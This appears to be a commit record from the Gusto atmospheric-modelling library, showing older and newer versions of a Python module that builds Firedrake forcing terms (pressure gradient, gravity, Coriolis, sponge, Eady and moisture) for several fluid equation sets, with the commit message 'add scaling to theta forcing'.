If False then this term is not added.
:arg linear: if True then we are solving a linear equation so nonlinear
terms (namely the Euler Poincare term) should not be added.
"""
__metaclass__ = ABCMeta
def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None):
self.state = state
if linear:
self.euler_poincare = False
warning('Setting euler_poincare to False because you have set linear=True')
else:
self.euler_poincare = euler_poincare
self.extra_terms = extra_terms
self._build_forcing_solver()
@abstractmethod
def _build_forcing_solver(self):
pass
@abstractmethod
def apply(self, scale, x, x_nl, x_out, **kwargs):
"""
Function takes x as input, computes F(x_nl) and returns
x_out = x + scale*F(x_nl)
as output.
:arg x: :class:`.Function` object
:arg x_nl: :class:`.Function` object
:arg x_out: :class:`.Function` object
:arg mu_alpha: scale for sponge term, if present
"""
pass
class CompressibleForcing(Forcing):
"""
Forcing class for compressible Euler equations.
"""
def _build_forcing_solver(self):
"""
Only put forcing terms into the u equation.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0,rho0,theta0 = split(self.x0)
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
cp = state.parameters.cp
mu = state.mu
n = FacetNormal(state.mesh)
pi = exner(theta0, rho0, state)
a = inner(w,F)*dx
L = self.scaling*(
+ cp*div(theta0*w)*pi*dx # pressure gradient [volume]
- cp*jump(w*theta0,n)*avg(pi)*dS_v # pressure gradient [surface]
)
if state.geopotential_form:
Phi = state.Phi
L += self.scaling*div(w)*Phi*dx # gravity term
else:
g = state.parameters.g
L -= self.scaling*g*inner(w,state.k)*dx # gravity term
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
if self.extra_terms is not None:
L += self.scaling*inner(w, self.extra_terms)*dx
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
u_out, _, _ = x_out.split()
x_out.assign(x_in)
u_out += self.uF
def exner(theta,rho,state):
"""
Compute the exner function.
"""
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa))
def exner_rho(theta,rho,state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*theta*kappa/(1-kappa)
def exner_theta(theta,rho,state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*rho*kappa/(1-kappa)
class IncompressibleForcing(Forcing):
"""
Forcing class for incompressible Euler Boussinesq equations.
"""
def _build_forcing_solver(self):
"""
Only put forcing terms into the u equation.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0,p0,b0 = split(self.x0)
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
mu = state.mu
a = inner(w,F)*dx
L = (
self.scaling*div(w)*p0*dx # pressure gradient
+ self.scaling*b0*inner(w,state.k)*dx # gravity term
)
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
Vp = state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
u_out, p_out, _ = x_out.split()
x_out.assign(x_in)
u_out += self.uF
if 'incompressible' in kwargs and kwargs['incompressible']:
self.divergence_solver.solve()
p_out.assign(self.divu)
class EadyForcing(Forcing):
"""
Forcing class for Eady Boussinesq equations.
"""
def _build_forcing_solver(self):
"""
Put forcing terms into the u & b equations.
"""
state = self.state
self.scaling = Constant(1.)
Vu = state.spaces("HDiv")
Vp = state.spaces("DG")
W = state.W
dbdy = state.parameters.dbdy
H = state.parameters.H
eady_exp = Function(Vp).interpolate(Expression(("x[2]-H/2"),H=H))
self.x0 = Function(W) # copy x to here
u0,p0,b0 = split(self.x0)
# u_forcing
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
Omega = state.Omega
mu = state.mu
a = inner(w,F)*dx
L = self.scaling*(
div(w)*p0 # pressure gradient
+ b0*inner(w,state.k) # gravity term
- dbdy*eady_exp*inner(w,as_vector([0.,1.,0.])) # Eady forcing
)*dx
if self.euler_poincare:
L -= self.scaling*0.5*div(w)*inner(u0, u0)*dx
if Omega is not None:
L -= self.scaling*inner(w,cross(2*Omega,u0))*dx # Coriolis term
if mu is not None:
self.mu_scaling = Constant(1.)
L -= self.mu_scaling*mu*inner(w,state.k)*inner(u0,state.k)*dx
bcs = [DirichletBC(Vu, 0.0, "bottom"),
DirichletBC(Vu, 0.0, "top")]
u_forcing_problem = LinearVariationalProblem(
a,L,self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
# b_forcing
Vb = state.spaces("HDiv_v")
F = TrialFunction(Vb)
gamma = TestFunction(Vb)
self.bF = Function(Vb)
a = gamma*F*dx
L = -gamma*self.scaling*(dbdy*inner(u0,as_vector([0.,1.,0.])))*dx
b_forcing_problem = LinearVariationalProblem(
a,L,self.bF
)
self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
# divergence_free
Vp = state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.scaling.assign(scaling)
if 'mu_alpha' in kwargs and kwargs['mu_alpha'] is not None:
self.mu_scaling.assign(kwargs['mu_alpha'])
self.u_forcing_solver.solve() # places forcing in self.uF
self.b_forcing_solver.solve() # places forcing in self.bF
u_out, p_out, b_out = x_out.split()
x_out.assign(x_in)
u_out += self.uF
b_out += self.bF
if kwargs.get("incompressible", False):
self.divergence_solver.solve()
p_out.assign(self.divu)
class ShallowWaterForcing(Forcing):
def _build_forcing_solver(self):
state = self.state
g = state.parameters.g
f = state.fields("coriolis")
Vu = state.spaces("HDiv")
W = state.W
self.x0 = Function(W) # copy x to here
u0, D0 = split(self.x0)
n = FacetNormal(state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
F = TrialFunction(Vu)
w = TestFunction(Vu)
self.uF = Function(Vu)
a = inner(w, F)*dx
L = (
(-f*inner(w, state.perp(u0)) + g*div(w)*D0)*dx
- g*inner(jump(w, n), un('+')*D0('+') - un('-')*D0('-'))*dS)
if hasattr(state.fields, "topography"):
b = state.fields("topography")
L += g*div(w)*b*dx - g*inner(jump(w, n), un('+')*b('+') - un('-')*b('-'))*dS
if self.euler_poincare:
L -= 0.5*div(w)*inner(u0, u0)*dx
u_forcing_problem = LinearVariationalProblem(
a, L, self.uF)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
self.x0.assign(x_nl)
self.u_forcing_solver.solve() # places forcing in self.uF
self.uF *= scaling
uF, _ = x_out.split()
x_out.assign(x_in)
uF += self.uF
class NoForcing(Forcing):
def _build_forcing_solver(self):
pass
def apply(self, scale, x_in, x_nl, x_out, **kwargs):
x_out.assign(x_in)
|
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, as_vector, SpatialCoordinate
__all__ = ["CompressibleForcing", "IncompressibleForcing", "EadyForcing", "CompressibleEadyForcing", "ShallowWaterForcing", "NoForcing", "exner", "exner_rho", "exner_theta"]
class Forcing(object, metaclass=ABCMeta):
"""
Base class for forcing terms for Gusto.
:arg state: x :class:`.State` object.
:arg euler_poincare: if True then the momentum equation is in Euler
Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
If False then this term is not added.
:arg linear: if True then we are solving a linear equation so nonlinear
terms (namely the Euler Poincare term) should not be added.
:arg extra_terms: extra terms to add to the u component of the forcing
term - these will be multiplied by the appropriate test function.
"""
def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None, moisture=None):
self.state = state
if linear:
self.euler_poincare = False
warning('Setting euler_poincare to False because you have set linear=True')
else:
self.euler_poincare = euler_poincare
# set up functions
self.Vu = state.spaces("HDiv")
# this is the function that the forcing term is applied to
self.x0 = Function(state.W)
self.test = TestFunction(self.Vu)
self.trial = TrialFunction(self.Vu)
# this is the function that contains the result of solving
# <test, trial> = <test, F(x0)>, where F is the forcing term
self.uF = Function(self.Vu)
# find out which terms we need
self.extruded = self.Vu.extruded
self.coriolis = state.Omega is not None or hasattr(state.fields, "coriolis")
self.sponge = state.mu is not None
self.topography = hasattr(state.fields, "topography")
self.extra_terms = extra_terms
self.moisture = moisture
# some constants to use for scaling terms
self.scaling = Constant(1.)
self.mu_scaling = Constant(1.)
self._build_forcing_solvers()
def mass_term(self):
return inner(self.test, self.trial)*dx
def coriolis_term(self):
u0 = split(self.x0)[0]
return -inner(self.test, cross(2*self.state.Omega, u0))*dx
def sponge_term(self):
u0 = split(self.x0)[0]
return self.state.mu*inner(self.test, self.state.k)*inner(u0, self.state.k)*dx
def euler_poincare_term(self):
u0 = split(self.x0)[0]
return -0.5*div(self.test)*inner(u0, u0)*dx
@abstractmethod
def pressure_gradient_term(self):
pass
def forcing_term(self):
L = self.pressure_gradient_term()
if self.extruded:
L += self.gravity_term()
if self.coriolis:
L += self.coriolis_term()
if self.euler_poincare:
L += self.euler_poincare_term()
if self.topography:
L += self.topography_term()
if self.extra_terms is not None:
L += inner(self.test, self.extra_terms)*dx
# scale L
L = self.scaling * L
# sponge term has a separate scaling factor as it is always implicit
if self.sponge:
L -= self.mu_scaling*self.sponge_term()
return L
def _build_forcing_solvers(self):
a = self.mass_term()
L = self.forcing_term()
if self.Vu.extruded:
bcs = [DirichletBC(self.Vu, 0.0, "bottom"),
DirichletBC(self.Vu, 0.0, "top")]
else:
bcs = None
u_forcing_problem = LinearVariationalProblem(
a, L, self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
"""
Function takes x as input, computes F(x_nl) and returns
x_out = x + scale*F(x_nl)
as output.
:arg x_in: :class:`.Function` object
:arg x_nl: :class:`.Function` object
:arg x_out: :class:`.Function` object
:arg mu_alpha: scale for sponge term, if present
"""
self.scaling.assign(scaling)
self.x0.assign(x_nl)
mu_scaling = kwargs.get("mu_alpha")
if mu_scaling is not None:
self.mu_scaling.assign(mu_scaling)
self.u_forcing_solver.solve() # places forcing in self.uF
uF = x_out.split()[0]
x_out.assign(x_in)
uF += self.uF
class CompressibleForcing(Forcing):
"""
Forcing class for compressible Euler equations.
"""
def pressure_gradient_term(self):
u0, rho0, theta0 = split(self.x0)
cp = self.state.parameters.cp
n = FacetNormal(self.state.mesh)
# introduce density potential temp
theta_rho = Function(theta0.function_space()).assign(theta0)
# adjust density potential temp for moisture species
if self.moisture is not None:
water_t = Function(theta0.function_space())
for water in moisture:
water_t += water
theta_rho = theta_rho / (1 + water_t)
pi = exner(theta0, rho0, self.state)
L = (
+ cp*div(theta_rho*self.test)*pi*dx
- cp*jump(self.test*theta_rho, n)*avg(pi)*dS_v
)
return L
def gravity_term(self):
if self.state.geopotential_form:
L = div(self.test)*self.state.Phi*dx
else:
g = self.state.parameters.g
L = -g*inner(self.test, self.state.k)*dx
return L
def theta_forcing(self):
cv = self.state.parameters.cv
c_vv = self.state.parameters.c_vv
c_pv = self.state.parameters.c_pv
c_pl = self.state.parameters.c_pl
R_d = self.state.parameters.R_d
R_v = self.state.parameters.R_v
u0, _, theta0 = split(self.x0)
water_v = self.state.fields('water_v')
water_c = self.state.fields('water_c')
c_vml = cv + water_v * c_vv + water_c * c_pl
c_pml = cp + water_v * c_pv + water_c * c_pl
R_m = R_d + water_v * R_v
L = -theta0 * (R_m / c_vml - (R_d * c_pml) / (cp * c_vml)) * div(u0)
return L
def _build_forcing_solvers(self):
super(CompressibleForcing, self)._build_forcing_solvers()
if self.moisture is not None:
_, _, theta0 = split(self.x0)
Vt = theta0.function_space()
p = TrialFunction(Vt)
q = TestFunction(Vt)
self.theta_new = Function(Vt)
a = p * q * dx
L = q * dx * self.theta_forcing()
theta_problem = LinearVariationalProblem(a, L, self.theta_new)
self.theta_solver = LinearVariationalSolver(theta_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(CompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
if 'compressible' in kwargs and kwargs['compressible']:
if self.moisture is not None:
_, _, theta_out = x_out.split()
self.theta_solver.solve()
theta_out.assign(self.theta_new)
def exner(theta, rho, state):
"""
Compute the exner function.
"""
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa))
def exner_rho(theta, rho, state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*theta*kappa/(1-kappa)
def exner_theta(theta, rho, state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*rho*kappa/(1-kappa)
class IncompressibleForcing(Forcing):
"""
Forcing class for incompressible Euler Boussinesq equations.
"""
def pressure_gradient_term(self):
_, p0, _ = split(self.x0)
L = div(self.test)*p0*dx
return L
def gravity_term(self):
_, _, b0 = split(self.x0)
L = b0*inner(self.test, self.state.k)*dx
return L
def _build_forcing_solvers(self):
super(IncompressibleForcing, self)._build_forcing_solvers()
Vp = self.state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
u0, _, _ = split(self.x0)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(IncompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
if 'incompressible' in kwargs and kwargs['incompressible']:
_, p_out, _ = x_out.split()
self.divergence_solver.solve()
p_out.assign(self.divu)
class EadyForcing(IncompressibleForcing):
"""
Forcing class for Eady Boussinesq equations.
"""
def forcing_term(self):
L = Forcing.forcing_term(self)
dbdy = self.state.parameters.dbdy
H = self.state.parameters.H
Vp = self.state.spaces("DG")
_, _, z = SpatialCoordinate(self.state.mesh)
eady_exp = Function(Vp).interpolate(z-H/2.)
L -= self.scaling*dbdy*eady_exp*inner(self.test, as_vector([0., 1., 0.]))*dx
return L
def _build_forcing_solvers(self):
super(EadyForcing, self)._build_forcing_solvers()
# b_forcing
dbdy = self.state.parameters.dbdy
Vb = self.state.spaces("HDiv_v")
F = TrialFunction(Vb)
gamma = TestFunction(Vb)
self.bF = Function(Vb)
u0, _, b0 = split(self.x0)
a = gamma*F*dx
L = -self.scaling*gamma*(dbdy*inner(u0, as_vector([0., 1., 0.])))*dx
b_forcing_problem = LinearVariationalProblem(
a, L, self.bF
)
self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(EadyForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
self.b_forcing_solver.solve() # places forcing in self.bF
_, _, b_out = x_out.split()
b_out += self.bF
class CompressibleEadyForcing(CompressibleForcing):
"""
Forcing class for compressible Eady equations.
"""
def forcing_term(self):
# L = super(EadyForcing, self).forcing_term()
L = Forcing.forcing_term(self)
dthetady = self.state.parameters.dthetady
Pi0 = self.state.parameters.Pi0
cp = self.state.parameters.cp
_, rho0, theta0 = split(self.x0)
Pi = exner(theta0, rho0, self.state)
Pi_0 = Constant(Pi0)
L += self.scaling*cp*dthetady*(Pi-Pi_0)*inner(self.test, as_vector([0., 1., 0.]))*dx # Eady forcing
return L
def _build_forcing_solvers(self):
super(CompressibleEadyForcing, self)._build_forcing_solvers()
# theta_forcing
dthetady = self.state.parameters.dthetady
Vt = self.state.spaces("HDiv_v")
F = TrialFunction(Vt)
gamma = TestFunction(Vt)
self.thetaF = Function(Vt)
u0, _, _ = split(self.x0)
a = gamma*F*dx
L = -self.scaling*gamma*(dthetady*inner(u0, as_vector([0., 1., 0.])))*dx
theta_forcing_problem = LinearVariationalProblem(
a, L, self.thetaF
)
self.theta_forcing_solver = LinearVariationalSolver(theta_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
Forcing.apply(self, scaling, x_in, x_nl, x_out, **kwargs)
self.theta_forcing_solver.solve() # places forcing in self.thetaF
_, _, theta_out = x_out.split()
theta_out += self.thetaF
class ShallowWaterForcing(Forcing):
def coriolis_term(self):
f = self.state.fields("coriolis")
u0, _ = split(self.x0)
L = -f*inner(self.test, self.state.perp(u0))*dx
return L
def pressure_gradient_term(self):
g = self.state.parameters.g
u0, D0 = split(self.x0)
n = FacetNormal(self.state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
L = g*(div(self.test)*D0*dx
- inner(jump(self.test, n), un('+')*D0('+')
- un('-')*D0('-'))*dS)
return L
def topography_term(self):
g = self.state.parameters.g
u0, _ = split(self.x0)
b = self.state.fields("topography")
n = FacetNormal(self.state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
L = g*div(self.test)*b*dx - g*inner(jump(self.test, n), un('+')*b('+') - un('-')*b('-'))*dS
return L
class NoForcing(Forcing):
def _build_forcing_solver(self):
pass
def apply(self, scale, x_in, x_nl, x_out, **kwargs):
x_out.assign(x_in)
add scaling to theta forcing
from abc import ABCMeta, abstractmethod
from firedrake import Function, split, TrialFunction, TestFunction, \
FacetNormal, inner, dx, cross, div, jump, avg, dS_v, \
DirichletBC, LinearVariationalProblem, LinearVariationalSolver, \
dot, dS, Constant, warning, as_vector, SpatialCoordinate
__all__ = ["CompressibleForcing", "IncompressibleForcing", "EadyForcing", "CompressibleEadyForcing", "ShallowWaterForcing", "NoForcing", "exner", "exner_rho", "exner_theta"]
class Forcing(object, metaclass=ABCMeta):
"""
Base class for forcing terms for Gusto.
:arg state: x :class:`.State` object.
:arg euler_poincare: if True then the momentum equation is in Euler
Poincare form and we need to add 0.5*grad(u^2) to the forcing term.
If False then this term is not added.
:arg linear: if True then we are solving a linear equation so nonlinear
terms (namely the Euler Poincare term) should not be added.
:arg extra_terms: extra terms to add to the u component of the forcing
term - these will be multiplied by the appropriate test function.
"""
def __init__(self, state, euler_poincare=True, linear=False, extra_terms=None, moisture=None):
self.state = state
if linear:
self.euler_poincare = False
warning('Setting euler_poincare to False because you have set linear=True')
else:
self.euler_poincare = euler_poincare
# set up functions
self.Vu = state.spaces("HDiv")
# this is the function that the forcing term is applied to
self.x0 = Function(state.W)
self.test = TestFunction(self.Vu)
self.trial = TrialFunction(self.Vu)
# this is the function that contains the result of solving
# <test, trial> = <test, F(x0)>, where F is the forcing term
self.uF = Function(self.Vu)
# find out which terms we need
self.extruded = self.Vu.extruded
self.coriolis = state.Omega is not None or hasattr(state.fields, "coriolis")
self.sponge = state.mu is not None
self.topography = hasattr(state.fields, "topography")
self.extra_terms = extra_terms
self.moisture = moisture
# some constants to use for scaling terms
self.scaling = Constant(1.)
self.mu_scaling = Constant(1.)
self._build_forcing_solvers()
def mass_term(self):
return inner(self.test, self.trial)*dx
def coriolis_term(self):
u0 = split(self.x0)[0]
return -inner(self.test, cross(2*self.state.Omega, u0))*dx
def sponge_term(self):
u0 = split(self.x0)[0]
return self.state.mu*inner(self.test, self.state.k)*inner(u0, self.state.k)*dx
def euler_poincare_term(self):
u0 = split(self.x0)[0]
return -0.5*div(self.test)*inner(u0, u0)*dx
@abstractmethod
def pressure_gradient_term(self):
pass
def forcing_term(self):
L = self.pressure_gradient_term()
if self.extruded:
L += self.gravity_term()
if self.coriolis:
L += self.coriolis_term()
if self.euler_poincare:
L += self.euler_poincare_term()
if self.topography:
L += self.topography_term()
if self.extra_terms is not None:
L += inner(self.test, self.extra_terms)*dx
# scale L
L = self.scaling * L
# sponge term has a separate scaling factor as it is always implicit
if self.sponge:
L -= self.mu_scaling*self.sponge_term()
return L
def _build_forcing_solvers(self):
a = self.mass_term()
L = self.forcing_term()
if self.Vu.extruded:
bcs = [DirichletBC(self.Vu, 0.0, "bottom"),
DirichletBC(self.Vu, 0.0, "top")]
else:
bcs = None
u_forcing_problem = LinearVariationalProblem(
a, L, self.uF, bcs=bcs
)
self.u_forcing_solver = LinearVariationalSolver(u_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
"""
Function takes x as input, computes F(x_nl) and returns
x_out = x + scale*F(x_nl)
as output.
:arg x_in: :class:`.Function` object
:arg x_nl: :class:`.Function` object
:arg x_out: :class:`.Function` object
:arg mu_alpha: scale for sponge term, if present
"""
self.scaling.assign(scaling)
self.x0.assign(x_nl)
mu_scaling = kwargs.get("mu_alpha")
if mu_scaling is not None:
self.mu_scaling.assign(mu_scaling)
self.u_forcing_solver.solve() # places forcing in self.uF
uF = x_out.split()[0]
x_out.assign(x_in)
uF += self.uF
class CompressibleForcing(Forcing):
"""
Forcing class for compressible Euler equations.
"""
def pressure_gradient_term(self):
u0, rho0, theta0 = split(self.x0)
cp = self.state.parameters.cp
n = FacetNormal(self.state.mesh)
# introduce density potential temp
theta_rho = Function(theta0.function_space()).assign(theta0)
# adjust density potential temp for moisture species
if self.moisture is not None:
water_t = Function(theta0.function_space())
for water in moisture:
water_t += water
theta_rho = theta_rho / (1 + water_t)
pi = exner(theta0, rho0, self.state)
L = (
+ cp*div(theta_rho*self.test)*pi*dx
- cp*jump(self.test*theta_rho, n)*avg(pi)*dS_v
)
return L
def gravity_term(self):
if self.state.geopotential_form:
L = div(self.test)*self.state.Phi*dx
else:
g = self.state.parameters.g
L = -g*inner(self.test, self.state.k)*dx
return L
def theta_forcing(self):
cv = self.state.parameters.cv
c_vv = self.state.parameters.c_vv
c_pv = self.state.parameters.c_pv
c_pl = self.state.parameters.c_pl
R_d = self.state.parameters.R_d
R_v = self.state.parameters.R_v
u0, _, theta0 = split(self.x0)
water_v = self.state.fields('water_v')
water_c = self.state.fields('water_c')
c_vml = cv + water_v * c_vv + water_c * c_pl
c_pml = cp + water_v * c_pv + water_c * c_pl
R_m = R_d + water_v * R_v
L = -theta0 * (R_m / c_vml - (R_d * c_pml) / (cp * c_vml)) * div(u0)
return self.scaling * L
def _build_forcing_solvers(self):
super(CompressibleForcing, self)._build_forcing_solvers()
if self.moisture is not None:
_, _, theta0 = split(self.x0)
Vt = theta0.function_space()
p = TrialFunction(Vt)
q = TestFunction(Vt)
self.theta_new = Function(Vt)
a = p * q * dx
L = q * dx * self.theta_forcing()
theta_problem = LinearVariationalProblem(a, L, self.theta_new)
self.theta_solver = LinearVariationalSolver(theta_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(CompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
if 'compressible' in kwargs and kwargs['compressible']:
if self.moisture is not None:
_, _, theta_out = x_out.split()
self.theta_solver.solve()
theta_out.assign(self.theta_new)
def exner(theta, rho, state):
"""
Compute the exner function.
"""
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa))
def exner_rho(theta, rho, state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*theta*kappa/(1-kappa)
def exner_theta(theta, rho, state):
R_d = state.parameters.R_d
p_0 = state.parameters.p_0
kappa = state.parameters.kappa
return (R_d/p_0)**(kappa/(1-kappa))*pow(rho*theta, kappa/(1-kappa)-1)*rho*kappa/(1-kappa)
class IncompressibleForcing(Forcing):
"""
Forcing class for incompressible Euler Boussinesq equations.
"""
def pressure_gradient_term(self):
_, p0, _ = split(self.x0)
L = div(self.test)*p0*dx
return L
def gravity_term(self):
_, _, b0 = split(self.x0)
L = b0*inner(self.test, self.state.k)*dx
return L
def _build_forcing_solvers(self):
super(IncompressibleForcing, self)._build_forcing_solvers()
Vp = self.state.spaces("DG")
p = TrialFunction(Vp)
q = TestFunction(Vp)
self.divu = Function(Vp)
u0, _, _ = split(self.x0)
a = p*q*dx
L = q*div(u0)*dx
divergence_problem = LinearVariationalProblem(
a, L, self.divu)
self.divergence_solver = LinearVariationalSolver(divergence_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(IncompressibleForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
if 'incompressible' in kwargs and kwargs['incompressible']:
_, p_out, _ = x_out.split()
self.divergence_solver.solve()
p_out.assign(self.divu)
class EadyForcing(IncompressibleForcing):
"""
Forcing class for Eady Boussinesq equations.
"""
def forcing_term(self):
L = Forcing.forcing_term(self)
dbdy = self.state.parameters.dbdy
H = self.state.parameters.H
Vp = self.state.spaces("DG")
_, _, z = SpatialCoordinate(self.state.mesh)
eady_exp = Function(Vp).interpolate(z-H/2.)
L -= self.scaling*dbdy*eady_exp*inner(self.test, as_vector([0., 1., 0.]))*dx
return L
def _build_forcing_solvers(self):
super(EadyForcing, self)._build_forcing_solvers()
# b_forcing
dbdy = self.state.parameters.dbdy
Vb = self.state.spaces("HDiv_v")
F = TrialFunction(Vb)
gamma = TestFunction(Vb)
self.bF = Function(Vb)
u0, _, b0 = split(self.x0)
a = gamma*F*dx
L = -self.scaling*gamma*(dbdy*inner(u0, as_vector([0., 1., 0.])))*dx
b_forcing_problem = LinearVariationalProblem(
a, L, self.bF
)
self.b_forcing_solver = LinearVariationalSolver(b_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
super(EadyForcing, self).apply(scaling, x_in, x_nl, x_out, **kwargs)
self.b_forcing_solver.solve() # places forcing in self.bF
_, _, b_out = x_out.split()
b_out += self.bF
class CompressibleEadyForcing(CompressibleForcing):
"""
Forcing class for compressible Eady equations.
"""
def forcing_term(self):
# L = super(EadyForcing, self).forcing_term()
L = Forcing.forcing_term(self)
dthetady = self.state.parameters.dthetady
Pi0 = self.state.parameters.Pi0
cp = self.state.parameters.cp
_, rho0, theta0 = split(self.x0)
Pi = exner(theta0, rho0, self.state)
Pi_0 = Constant(Pi0)
L += self.scaling*cp*dthetady*(Pi-Pi_0)*inner(self.test, as_vector([0., 1., 0.]))*dx # Eady forcing
return L
def _build_forcing_solvers(self):
super(CompressibleEadyForcing, self)._build_forcing_solvers()
# theta_forcing
dthetady = self.state.parameters.dthetady
Vt = self.state.spaces("HDiv_v")
F = TrialFunction(Vt)
gamma = TestFunction(Vt)
self.thetaF = Function(Vt)
u0, _, _ = split(self.x0)
a = gamma*F*dx
L = -self.scaling*gamma*(dthetady*inner(u0, as_vector([0., 1., 0.])))*dx
theta_forcing_problem = LinearVariationalProblem(
a, L, self.thetaF
)
self.theta_forcing_solver = LinearVariationalSolver(theta_forcing_problem)
def apply(self, scaling, x_in, x_nl, x_out, **kwargs):
Forcing.apply(self, scaling, x_in, x_nl, x_out, **kwargs)
self.theta_forcing_solver.solve() # places forcing in self.thetaF
_, _, theta_out = x_out.split()
theta_out += self.thetaF
class ShallowWaterForcing(Forcing):
def coriolis_term(self):
f = self.state.fields("coriolis")
u0, _ = split(self.x0)
L = -f*inner(self.test, self.state.perp(u0))*dx
return L
def pressure_gradient_term(self):
g = self.state.parameters.g
u0, D0 = split(self.x0)
n = FacetNormal(self.state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
L = g*(div(self.test)*D0*dx
- inner(jump(self.test, n), un('+')*D0('+')
- un('-')*D0('-'))*dS)
return L
def topography_term(self):
g = self.state.parameters.g
u0, _ = split(self.x0)
